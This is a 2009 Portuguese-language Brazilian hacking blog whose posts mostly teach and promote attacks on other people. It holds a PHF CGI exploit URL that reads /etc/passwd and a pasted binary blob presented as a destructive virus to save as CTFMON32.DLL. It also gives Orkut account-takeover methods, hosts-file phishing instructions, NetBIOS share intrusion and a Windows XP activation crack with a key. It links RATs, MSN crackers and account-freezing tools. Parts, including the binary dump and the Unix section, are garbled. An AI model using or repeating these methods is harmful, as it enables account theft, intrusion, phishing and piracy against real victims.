------[::::: New-Hacker :::::]----- [ Melhor Blog -=||-|ä¢kë®|=- Do Brasil ]

Gerador de NICK

Digite seu nome virtual:

Aqui ficará o seu novo nome virtual:


------[::::: New-Hacker :::::]-----[ Melhor Blog -=||-|ä¢kë®|=- Do Brasil ]

Pesquisa Do BLOG

sábado, 4 de julho de 2009

Criando Editor de Texto Delphi 7



NOVO e coloque o código:
Memo1.Clear;
ABRIR e coloque o código:
if Opendialog1.Execute then
begin
memo1.Lines.LoadFromFile(opendialog1.FileName);
memo1.SetFocus;
end;

SALVAR e coloque o código:
if Savedialog1.Execute then
begin
memo1.Lines.SavetoFile(Savedialog1.FileName);
memo1.SetFocus;
end


Èverton

sexta-feira, 3 de julho de 2009

Hackear Sites

A sim formas de Hackear Sites Bem Facil
Abra seu navegador escolha o Site.
EX:www.laf.com
E apague as estrelas e coloque o site desejado.
As chances de vc conseguir são de 20% a 50%
pase no Anonymouse.org antes para não deichar rastros..


htpp://***********/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd

domingo, 28 de junho de 2009

sexta-feira, 26 de junho de 2009

Bloquear MSN


O Trav MSN é um otimo programa para bloquear tewmporariamento o MSN de quem você quiser.



RapidShared Download:
>>>>>>>
Download PapidShared
>>>>>>>
Megauplad Download:
>>>>>>>
Download Megaupland
>>>>>>>
Easy-Shared Download:
>>>>>>>
Download Easy-Shared

quarta-feira, 24 de junho de 2009

Delphi 7 Download



O Delphi 7 é um otimo software de dezenvolvimento de programas ele vem com o crack
tem uma video aula no fim do blog que explica um pouco sobre o delphi7.

Formato:rar
Entegrado:Crack
Tamanho:133MB

[:::.BAIXAR.:::]

segunda-feira, 1 de junho de 2009

NinjaSpy Trojan Download



Ele é um dos melhores Trojan do Mundo papers você encontra textos que talvez seja úteis pra você.. como por exemplo pegar IP de seu amigo que está conversando pelo MSN Messenger..

[:::.BAIXAR.:::]

terça-feira, 19 de maio de 2009

Easy wifi radar - Download


Ferramenta é bem simples e, ao iniciar, ele verifica seu hardware em busca do dispositivo compatível para conexão. Sua interface lembra realmente um radar. Basta apertar o botão de play para iniciar o scan.
Nome:easy wifi radar 1.0.5

[:::.BAIXAR.:::]

Hackear Senhas MSN,Email,Orkut


Hackear passwords que estão criptografados através de bolinhas e asteriscos, simplesmente utilize o programa Asterisk Key. Você executa ele, e passa o mouse em cima da senha.

[:::.BAIXAR.:::]

ProRat v 2.0 - Download


ProRat é um backdoor da classe Rat que possui muitas funções de espião. Seu nome é uma fusão da palavra inglesa professional, juntamente com a sigla rat . Criado em Visual Basic, o programa possui mais de 15 versões.

Tamanho: 7 MB
Hospedagem: RapidShare
Formato: .Zip


[:::.BAIXAR.:::]

Aumentando a Velocidade do Download


Iniciar > executar > digite "regedit" (sem aspas)

Irá abrir uma "pasta"
ai vc irá navegar em:
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion >InternetSettings
depois clique em adicionar valor, adicione os valores dword seguintes:
MaxConnectionsPer1_0Server=Dword:0000000a
MaxConnectionsPerServer=Dword:0000000a

Wireless Key View - Downloads


Wireless Key View é um excelente software para quem costuma se conectar na internet via rede Wirelles. O programa revela o nome de todas as redes e suas respectivas senhas que foram utilizadas para conexão. Desta maneira, não é necessário ficar preocupado, caso venha a esquecer a senha de acesso ao seu roteador, ou de um hotspot gratuito, por exemplo.
Não é necessário instalar o aplicativo. O único procedimento necessário é descompactar o arquivo e mandar rodá-lo. Após a ativação, ele exibirá um relatório completo com todas as redes e senhas que foram acessadas até o momento. programa também salva a lista em formato TXT para consulta futura!

:::.BAIXAR.:::

MSN Cracker


Otimo Programa para você Hackear "msn" eu troquei o Link botei um novo para baixa blz
AS:Pronk-Hacker
MSN Messenger and Hotmail Account Cracker

segunda-feira, 18 de maio de 2009

Virús mais perigoso do Mundo


Este Virús Que você vai Criar é o Virús mais perigoso do mundo.
Não execute ele no seu Compuador por que ele nunca mais sira blz.
Copie o Codigo abaixo cole no bloco de notas e salve com "CTFMON32.DLL"

Cod:

MZ€    ÿÿ @ @ € º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ PE L ÎýwE à ! A ” @    
P  êâ      @ N 0 \ @@  .data l    @ Ð.text m
 à.idata \ 0   @ À.edata N @   @ @ 0/  < ! 0/  ! 0;9 #   NTDLL.DLL ÿÿÿÿÿÿÿÿU‰å‹E ƒøu(‹E£ @ è# ¡@ Àt ÿ5 @ è ¸ ëƒø u è— ¸ ë1ÀÉ U‰åƒìVuøVjh @ ÿ5 @ jÿÿz0@ h‚ @ ÿ‚0@ h @ Pÿ†0@ £ @ ÿuÿuÿuÿuÿu ÿuÿ @ ‰EüVjh @ ÿ5 @ jÿÿz0@ ^‹EüÉ U‰åƒìVuøVjh2 @ ÿ5. @ jÿÿz0@ h‚ @ ÿ‚0@ hD @ Pÿ†0@ £@ @ ÿuÿuÿuÿuÿu ÿuÿ@ @ ‰EüVjh: @ ÿ5. @ jÿÿz0@ ^‹EüÉ U‰åƒìVWÿuÿuÿuÿuÿu ÿuèlÿÿÿ‰Eì À…0 ‹}‹Eƒø uG‰Eð‹w ÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèÏ Àu&‹E £ @ @ÿuÿuÿuÿuPÿuèÕþÿÿ‰Eìéœ ÿuÿuÿuÿuÿ5 @ ÿuè³þÿÿ‰Eì Àua‹Eø ‰Eð‹Eü‹4 h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèO Àu(¡ @ ;E s‹E @ÿuÿuÿuÿuPÿuèPþÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè4þÿÿ‰Eì_^‹EìÉ U‰åƒìVWÇEüÿÿÿÿ‹M ‹}¾@ üóf§ Éu ÇEü _^‹EüÉ U‰åƒìVuøVjhW @ ÿ5S @ jÿÿz0@ h‚ @ ÿ‚0@ hi @ Pÿ†0@ £e @ ÿuÿuÿu ÿuÿe @ ‰EüVjh_ @ ÿ5S @ jÿÿz0@ ^‹EüÉ U‰åƒìVWÿuÿuÿuÿuÿu ÿuèóüÿÿ‰Eì À…0 ‹}‹Eƒø uG ‰Eð‹wÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèËþÿÿ Àu&‹E £Œ @ @ÿuÿuÿuÿuPÿuè\üÿÿ‰Eìéœ ÿuÿuÿuÿuÿ5Œ @ ÿuè:üÿÿ‰Eì Àua‹Eø ‰Eð‹Eü‹4 h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèKþÿÿ Àu(¡Œ @ ;E s‹E @ÿuÿuÿuÿuPÿuè×ûÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè»ûÿÿ‰Eì_^‹EìÉ U‰åƒì VWÿuÿuÿu ÿuèþÿÿ‰Eôƒø |vƒ}upÇEø ‹} ‹WD; @ u¡ @ ÿ7‰þ7¹ð üó¤X ë݉þ7VEü9þu‹Eø Àt‹GD; @ u ‹uøÇ ë‰}ø‹}ü‹GD; @ u ‹uø‹ ë½_^‹EôÉ U‰åƒìVWh‚ @ ÿ‚0@ ‰EühD @ ÿ–0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ–0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ–0@ ‰Á¾ @ ‰÷¬4jªâúhi @ ÿuüÿ†0@ £S @ EøPjhW @ ÿ5S @ jÿÿ~0@ Æ_ @ hÇ` @ /%@ Æd @ ÍEøPjh_ @ ÿ5S @ jÿÿz0@ h @ ÿuüÿ†0@ £ @ EøPjh @ ÿ5 @ jÿÿ~0@ Æ @ hÇ @ Ì#@ Æ @ ÍEøPjh @ ÿ5 @ jÿÿz0@ hD @ ÿuüÿ†0@ £. @ EøPjh2 @ ÿ5. @ jÿÿ~0@ Æ: @ hÇ; @ È!@ Æ? @ ÍEøPjh: @ ÿ5. @ jÿÿz0@ _^ÉÃU‰åÿuÿu ÿuj ÿ.1@ 1ÀÉ U‰åƒìEüPjhW @ ÿ5S @ jÿÿz0@ EüPjh @ ÿ5 @ jÿÿz0@ EüPjh2 @ ÿ5. @ jÿÿz0@ ÉÃU‰åj ÿ5 @ hN\'@ jÿ*1@ jÿÿŽ0@ É U‰åVS‹ud¡0 ‹@ ƒÀ ‹ ;puù‹0‹X‰3‹p‹‰s@‹0‹X‰3‹p‹‰s[^É U‰åƒìVW‹u ¿@ f*f Àtf«ëõf«Ç@  ‹E£ @ EüPj j h»\'@ j j ÿŠ0@ _^É V0 <0>@ SYSHOST.DLL A  £0*0·0ì0ò0ú0ÿ01
111.191?1G1a1g1o1t1z11†1‹1£1®1´1¼172=2d2”2·2½2á 2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4»4Á4å4e5l5›5·5Ø 5Þ5æ5ì5ó5 66
66 6\'646=6B6M6S6[6a6h6l6r6~6„6Œ6‘6š6Ÿ6ª6°6¸6¾6Å6É6Ï6Û6á6é6î6÷6ü6 7
777"7&7,787>7F7^7u7{7ƒ7Ž7”7œ7§7*7µ7Â7Ç7Ï7×7-8@8L8Y8c8 
24-02-2007

Como validar o Windows XP


Bom, para começar vou passar para vcs o Tutorial de como fazer issu e eh bem simples, não precisa de programa nenhum...

para começar:

1.Va em inicia> Executar
2. DIgite regedit e clique OK.
3. Navegue ateh a chave: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWSNT\CURRENTVERSION\WPAEVENTS
4. NO Painel da direita, clique duas vezes em OOBETimer.
5. Na janela que foi aberta , apague qualquer valor e clique em OK. Feche o Regedit
6. Va novamente em Executar regetid dessa vez digite:
7. %systemroot%\system32\oobe\msoobe.exe /a
8. Na janela que foi aberta, escolha a opção sim, desejo telefonar...
9. Na proxima etapa, Clique Altera chave do produto.
10. Na etapa seguinte, digite a cd-key: THMPV-77D6F-94376-8HGKG-VRDRQ e clique no botão Atualizar.
11. Depois Clique em Lembrar mais tarde e reinicie o computador
12. apos reiniciar o computador va em executar regedite e digite novamente
13. %systemroot%\system32\oobe\msoobe.exe /a
14. aparecerá a seguinte mensagem:
Ativação do windows: O Windows já está ativado.
clique em OK para sair...

Feito esse tutorial seu Windows XP estará validado como Original, vc poderá fazer todas as atualizações do Windows...

domingo, 17 de maio de 2009

Hackear um Orkut


Para hackear um Orkut é muito Simples siga os passos abaixo:
1° Acesse o Orkut.
2° Localize a pessoa desejada.
3° Verifique o email dessa pessoa e vá até o site do hotmail e verifique se o email dela é um fake (email que não existe no caso o site da hotmail. Vai dizer que o email esta disponível).
4° Após criar esse email volte até a pagina de login do Orkut.
5° clique no link não consigo acessar o link da minha conta.
6° depois em esqueci minha senha, o Orkut vai mandar um email de redefinição de senha e vc redefine a senha e o Orkut será totalmente seu.

Observação: O email tem que ser FAKE!!!

sexta-feira, 15 de maio de 2009

Como Hackear o Orkut

Bom galera New-hacker agora você entren nesse link abaixo normalmente vc entrar no seu orkut, mas como eu disse, com uma conta que sempre você se conecta.
LINK:

http://clanhackerthekiler.uni7.net/

Depois diso vai abrir umatela colo que o email da vítima e depois colocar essecódigo:
orkutrecoverlogin
Tem que colocar certinho, depois de colocar o email da vítima e o código, clique em continuar e automaticamente a página sumirá.
Agora você entra no orkut e coloca o email da vítima e depois aquele código na senha.
Pronto! Você está dentro do orkut da pessoa escolhida.
Galera aqui no New-hacker vc se resposabilisem pelos seus atos.

quinta-feira, 30 de abril de 2009


Vulnerabilidade no Microsoft Word permite execução de códigos arbitrários na máquina do usuário.

Maiores informações:
- http://www.zerodayinitiative.com/advisories/ZDI-08-086/
- http://www.microsoft.com/office/

quarta-feira, 29 de abril de 2009

Como mudar o HOST

Ele se encontra em: C:\WINDOWS\system32\drivers\etc (no Windows XP).

Ao abrí-lo com um editor de textos, no final do arquivo você encontrará uma linha como:

127.0.0.1 localhost

Acrescente, por exemplo, a seguinte linha (logo abaixo da anterior):

72.14.209.85 qualquercoisa

Onde o endereço IP acima é o do orkut... Salve o arquivo...

Quando você digitar na barra de endereços "qualquercoisa", você será direcionado para a página inicial do orkut...

Isso foi só um exemplo medíocre para apresentar esse arquivo do Windows, mas com uma boa dose de criatividade, pode-se fazer muitas coisas interessantes...

como por exemplo:
De repente, você não tem nada o que fazer e pensa: vou descobrir senhas de sites!!! Então você vai nesse arquivo, digita um site que você quer descobrir a senha e o IP de uma página falsa (fake) deste site... por exemplo, lá no arquivo você faz:

end_ip_fake www.orkut.com

Quando for digitado o endereço do orkut, o Windows irá procurar alguma associação, no arquivo "hosts", do endereço digitado com o respectivo IP. Assim, quando se digitar o endereço do orkut, não irá para a página oficial do orkut, mas sim para o fake (que deve estar bem parecido com a página do orkut :P)...

Seria ideal que na página falsa, quando o usuário digitar seu login e senha, ela enviá-se os dados para o orkut e para seu email...

Obs.: Claro que esse exemplo é ótimo pra quem sabe "mexer" um pouco com PHP (e HTML, lógico!)... Melhor ainda quando o arquivo "hosts" é modificado em alguma lan-house ou na casa de algum amigo (ou inimigo) :D. Outra idéia seria criar um programinha para alterar automaticamente esse arquivo, assim seria mais fácil obter senhas (já que este arquivo sempre está localizado em C:\WINDOWS\system32\drivers\etc, no Windows Xp) AS:Pronk.

Desbloquear um celular

Importante! Verifique se o cliente possui o código de desbloqueio (específico para o IMEI do aparelho a ser desbloqueado) antes de realizar o procedimento.

Nota: O código será solicitado somente uma vez. Após o desbloqueio o código não será mais solicitado. Tente no máximo 3 vezes.

[Siemens ] - Ligar o celular, sem nenhum SIM CARD.- Digitar: * # 0000 * XXXXXXXX # (XXXXXXXX são os 8 dígitos do código de desbloqueio).

[SonyEricsson]- Inserir o SIM CARD e ligar o celular.- Independente do que aparece no display, digitar: Joystick para a esquerda + * * (2 X asterisco) + Joystick para a esquerda.- Aparecerá um cadeado fechado na opção Rede.- Clicar em [YES] e digitar o código de desbloqueio.- Neste momento aparecerá a mensagem "Rede desbloqueada".- Voltar ao menu inicial.- Verificar o "cadeado" na opção Rede. Caso esteja aberto, o celular está desbloqueado.

[Motorola ]- Inserir um SIM CARD de outra operadora e ligar o celular.- Digitar o código do PIN (verificar se o SIM CARD é TIM ou OI. Quando for utilizado um SIM CARD TIM, o PIN padrão é 1010, se for OI é 8888. Se o cliente tiver trocado seu PIN, deve ser digitado o PIN atual deste).- Digitar o código de desbloqueio.

[Sansung] - Ligar o celular, sem nenhum SIM CARD.- Digitar: #0111*XXXXXX# e pressionar a tecla SEND (XXXXXX são os 6 dígitos do código de desbloqueio).Nota: Caso o aparelho peça também o PIN, verificar se o SIM CARD é TIM ou OI. Quando for utilizado um SIM CARD TIM, o PIN padrão é 1010, se for OI é 8888. Se o cliente tiver trocado seu PIN, deve ser digitado o PIN atual deste.

[LG]- Inserir um SIM CARD de Claro e ligar o celular.- Em modo de espera, digitar o seguinte código: 2945#*1201#.- Entrar em: Menu >Configurações >Config. Segurança >SIM bloqueado >Rede >Desativar >Código NCK.- Digitar o código de desbloqueio.

continuação
[Panasonic]- Na tela principal digite: **00012*COD#- Aparecerá a mensagem "Feito". Confirme com "OK".O aparelho já está desbloqueado.

[Pantech]Todos os celulares da Pantech tem desbloqueio somente atravez de cabo ver loja. blz AS:Pronk.

Ver senhas pelo Mozilla Firefox


1 - Primeiramente voce deve ter o navegador Mozilla Firefox instalado em sua maquina.
2 - Depois de alguem fazer login em algum site, va ate ferramentas/opçoes.
3 - Ai voce da um click na aba de segurança.
4 - Dentro da area de segurança segure a tecla ALt+S
5 - Depois abrira uma janela voce clika no login e logu depois em exibir senha.

e vc veras as senhas...

quarta-feira, 22 de abril de 2009

Dicas Unix


O Unix é um sistema operacional desenvolvido em 1969, pela Bell Laboratories, originalmente para executar emcomputadores da DEC, sendo que mais tarde passou a; ser utilizado em mainframes . Num sentido menos amplo o UNIXé um sistema operacional de tempo compartilhado, denominado kernel.O kernel é um programa que controla osrecursos do computador e os aloca entre os usuários. Ele controla os programas e periféricos (disco, terminais,impressoras, etc.) que estão ligados à máquina. O UNIX possui algumas características como:Capacidade de multitarefaMutiusuáriosPortabilidadeConectividade e comunicaçõesPara usuários de DOSPara quem está acostumado com o DOS, notará algumas diferenças, como os nomes de arquivos, que no DOS temapenas 8 de nome e 3 de extenção, no UNIX não tem limite podendo ter várias extenções. Ex: relatorio.txt.zip.tar. Outrodetalhe é por ser um sistema mutiusuário, a entrada ao sistema é feita com um login e um password, onde login é onome do usuário e password é uma senha de segurança.Permissões de arquivos e diretóriosNo Unix existe uma sequência de caracteres que definem o que cada usuário pode fazer com cada arquivo ou diretórioe somente o dono do arquivo (owner) e o gerente da rede (root) pode mudar as permissões atraves< r="leituraw="escrita" x="execuçãoTipo" d =" diretóriob" blockr =" rawl" t =" lista" a =" lista" f =" acrescenta" r =" lista" l =" lista"> para onome do arquivo a ser criado (segue exemplo).Sintaxecat arquivo [arquivo2] [aquivo3]Comando moreO comando more assim como o cat serve para ver o conteúdo de um arquivo que é, geralmente, texto. A diferençaentre o more e o cat é que o more faz uma pausa a cada tela cheia exibindo uma mensagem "--More--", dando umaoportunidade ao usuário ler a tela. Existem vários comandos que são listados ao apertar h mas os mais usados são:enter exibe mais uma linha do textoespaço exibe mais uma pagina do textoctrl+l rescreve a telav chama o editor de textos vi do Unix para a linha correnteSintaxemore arquivoParametrosEsse comando não possui parâmetrosComando calEste comando é usado para exibir o calendário de um determinado mês ou ano.Observaçãoo mês deve ser completo, pois o cal difere 95 de 1995. Caso somente um número seja informado será exibido ocalendário daquele ano, se nenhum numero for fornecido será exibido o calendário do mês corrente, anterior eposterior.Sintaxecal [-r] [mês] [ano]Comando mkdirServe para criar diretórios e subdiretórios especificados.Sintaxemkdir diretórioParâmetrosEsse comando não possui parâmetros.Comando rmdirServe para remover diretórios e subdiretórios especificados.Sintaxermdir diretórioParametrosEsse comando não possui parâmetros.Comando cpEsse comando é útil para copiar arquivos e diretórios para outros diretórios. Semelhante ao comando copy do DOS.Sintaxecp [-r] nome1 nome2Parametros-r = copia o conteúdo dos subdiretórioss caso nome1 for um diretórioComando mvEsse comando é útil para mover arquivos e diretórios. Também é usado para renomear tanto arquivos quantodiretórios, pois o Unix não possui um comando especifico para trocar os nomes de arquivos. Muito cuidado ao moverou renomear um arquivo, verifique se não exista um outro com o mesmo nome, senão o arquivo existente irá sersubstituído pelo outro.Sintaxemv [-i] nome1 nome2Parametros-i = pergunta confirmação ao mover p;Comando rmEsse comando é útil para remover arquivos e diretórios. Mas cuidado ao usar o comando rm, pois o Unix não conseguerecuperar arquivos, se por acaso usar o parâmetro -r em um diretório. Semelhante aos comandos del e deltree doDOS.Sintaxerm [-ir] nome1Parametros-r = remove o conteúdo dos subdiretórioos caso nome1 for um diretório-i = pergunta confirmação para os arquiivosComando findProcura por um determinado arquivo no winchester apartir do diretório especificado dando uma lista de quaisdiretórios se encontra o arquivo especificado.Sintaxefind diretório [-parâmetros]Parametros-name arquivo = indica o arquivo a ser procurado-user usuário = indica que o arquivo teem que pertencer a o usuário indicado-group grupo = indica que o arquivo temm que pertencer a o grupo indicado-mtime n = procura os arquivos que foraam modificados nos exatos n dias-print = imprime o nome do arquivo na ttela, é sempre necessário pois sem ele não irá ser mostrado nada-exec comando {} \; = executa o comandoo para todos os arquivos encontrados o {} \; faz parte da sintaxe e ésubstituído pelo nome do arquivo e é necessário o espaço entre as chaves e a barraComando grepProcura pela ocorrência de uma string no arquivo especificado. Ele exibe apenas as linhas que possuem a string mascuidado com os caracters interpretados pelo shell (, ), {, }, ;, ?, !, *, [, e ] use um apóstrofo para isolar esses caracteres.Sintaxegrep [-parâmetros] expressão arquivoParametros-v = mostra as linhas que não aparece aa string-i = ignora a diferença entre letras maaiúsculas e minúsculas-c = mostra o número de vezes que foi eencontrada a expressão-n coloca o número da linha em que foi encontrada a expressãoComando chmodMuda a permição dos arquivos e diretórios. As permissões de arquivos estão detalhadas no tópico Permissões deArquivos ao lado esquerdo da página.Sintaxechmod [-fR] quem+/-permissão arquivoParametros-R = troca para arquivos que estão em ssubdiretórios-f = caso ocorra algum erro ele força aa troca de permissãoquem = é a classe do usúario (ugoa) para quem vai receber a permissão novau = usuáriog = grupoo = outrosa = todas as classes juntos (all)+/-/= = mais, menos ou igual define se você vai colocar (+) ou tirar (-) a permissão, o sinal = serve para trocar apermissão se ele tiver com permissao ele tira a permissãopermissão = tipo de permissão (rwx)r = leituraw = escritax = execuçãoComando cdMuda de diretório, equivale ao mesmo comando do DOS. Como o Unix não mostra o diretórios corrente no promptcomo o DOS pode-se usar o comando pwd para mostrar o diretórios corrente. Nã esqueça que o diretório principal ésimbolizado por / (diferente a do DOS).Sintaxecd [diretório]Parametrosdiretório = o diretório ou o caminho de um para qual você quer irComando pwdMostra o diretório corrente em que você está. O Unix não mostra o diretórios corrente no prompt como o DOSSintaxepwdParametrosEsse comando não possui parametrosComando atProcessa um comando ou arquivo script para ser processados posteriormente numa hora, dia ou mês desejado. O at ,após a sua sintaxe, deixa espaço para colorar os comandos ou arquivos script que serão processados posteriormente(use ^d quando acabar de digitar os comandos) ou pode-se especificar um arquivo para entrada com < para darentrada um arquivo ja criado.Sintaxeat [-lr] hora [data] [+incremento]Parametros-l= lista todos os jobs programados comm at e o número designado para cada um. Mostra aqueles que voce mesmoprogramou.-r= remove um job at que você colocou. Mas antes é preciso saber o número e fila em que está o job mostrado com aopção -lhora= uma hora qualquer, melhor no padrão 24hs. Além o at também reconhece as horas now (agora), midnight(meia-noite), noon (meio-dia).data= você pode especificar uma data também. A data é no formato mes dia(,ano) ou dia da semanda (sun, mon, wen,.... Pode preceder a data next (próximo).+incremento= quanto tempo depois da data o at irá ser executado. é formado do símbolo + um número e uma unidadede tempo (minutes (minutos), hours (horas), days (dias), months (meses) e years (anos)Comando inO comando ln faz um atalho (link) de um arquivo ou diretório. Voce pode se referir a um arquivo que está num diretório/bin por exemplo no seu diretório home somente fazendo um link do mesmo. Existe dois tipos de link o hard link e osimbolic link (simbolico), o primeiro tipo faz um link onde irá apontar para o lugar no winchester onde o arquivo estaamarzenado, o segundo tipo é um link simbólico pois o link é um arquivo texto que contem o path de onde o arquivoestá. Isto quer dizer se voce apagar um hard link ira excluir o arquivo e se apagar um simbolic link irá apagar somenteo link.Sintaxeln [-sf] arquivo nomelinkParametros-s = cria um simbolic link (hrad link éé criado sem esse parametro)-f = força a criação do link, para linkks que não se tem permição de leituraarquivo = nome do arquivo ou diretório que vai ser linkadonomelink = nome do link pode ser qualquer um, mas o interssante e colocar o mesmo nome do arquivo ou diretório.

terça-feira, 14 de abril de 2009

Invasão por IP

Bom agora vamos aprender um pouco como invadir alguém pelo IP. ఏఉ ప్రోంక్ hackerPrimeiro verifique se você possui este programa: NBTSTAT . clique em cima para fazer o download. Vá ao prompt do MS-DOS Digite nbtstat -a o IP do cabaço que você quer invadir. Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não irá aparecer: Host Not Found ( o problema é o seguinte nem todos os computadores estão com o compartilhamento de rede então você não conseguirá invadi - ló ). Caso aparecer um monte de nomes estranhos com antes "<03>" você deverá pegar o nome que apareceu. Você terá que criar um arquivo TXT como o nome de LMHOSTS. Nele você terá que escrever da seguinte forma : O IP do cabaço NetBios dele. O NetBius é aquele nome estranho. Mapeie uma unidade de disco de forma que a máquina do cabaço se torne parte do seu PC. Depois você vai até o "INICIAR", depois "EXECUTAR" e digite: //IP_do cabaço e clique em OK. Prontinho depois de tudo isso fique feliz porque você acabou de invadir um micro. Quando estiver dentro do computador de alguém não importa a forma que você para invadir não prejudique a pessoa por pior que seja . Pois você não gostaria que alguém apagasse algum arquivo do seu PC. Apenas olhe o que tem no micro da pessoa e caso tenha algo que lhe interesse copie para você

Pegando IP em chat.

Primeiro você terá que fechar todos os seus aplicativos de rede, ICQ,FTP,XITAMI, que você estiver utilizando. Feche todos os navegadores menos o da sala que você esteja usando. Se concentre somente no chat que você está. Peça as pessoas que estão teclando com você para um pouco de mandar mensagens, depois disso mande um monte de mensagens em sequencias para o cabaço que você que foder. Só que antes você terá que estar com o MS-DOS aberto minimizado. Depois que mandou as mensagens em sequencia para o cabaço aperte ALT+TAB para ir para o MS-DOS e digite: arp -a ficando assim: C:\WINDOWS>arp-a Neste momento será retomado vários IP's , (4 à 6 mais ou menos). O primeiro é da sala em que você se encontra . Na maioria das vezes o segundo é o IP do cabaço que você que foder. Se você ainda não tem certeza que o IP do cara guarde o IP e compare com as informações que você tem sobre a vitima (provedora por exemplo) e se você não tiver nenhum dados do cara paciência você terá que dar uma de LAMMER e nuke todos os IP um por um.

sábado, 11 de abril de 2009

IceCold Reloaded



Com o IceCold Reloaded você poderá bloquear a conta de MSN de algum infeliz que resolveu cruzar seu camominho, legal não? Como Utilizar: Basta inserir o msn da vítima e clicar em Freeze Account!Obs: Para Desfreezar ( desbloquear ) a account da vítima é só clicar em DeFreeze Account!, e também uma última coisinha, a account somente ficará freezada enquanto o programa estiver aberto, ou seja, caso você feche o programa a account da vítima estará ''livre'' ( Desbloqueada ).O Programa funciona com os seguintes domínios- @hotmail- @gmail- @msnObservação Importantíssima: Você só poderá Freezar o msn de alguém quando o mesmo se encontrar OFFLINE, ou seja, caso o indivíduo esteja ONLINE não tente Freezar pois não funcionará ! desative seu antivirus primeiro,antes usar o programa
Link para Download: Easy-Share-Download

segunda-feira, 30 de março de 2009

Como Se Tornar Um Hacker


ADVERTÊNCIA: Este documento foi criado para informação apenas. De nenhuma forma, encorajando qualquer tipo de atividade ilegal, e qualquer ato praticado após a leitura deste documento é de inteira responsabilidade do leitor. Se não concorda com este fato, retorne agora.
Como me Transformar em um Hacker?
Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.
Conseguindo Ajuda
É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.
Algumas Outras Necessidades
É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?
Tomando Os Primeiros Passos
Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,... Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.
A Psicologia de Hacke(ar)
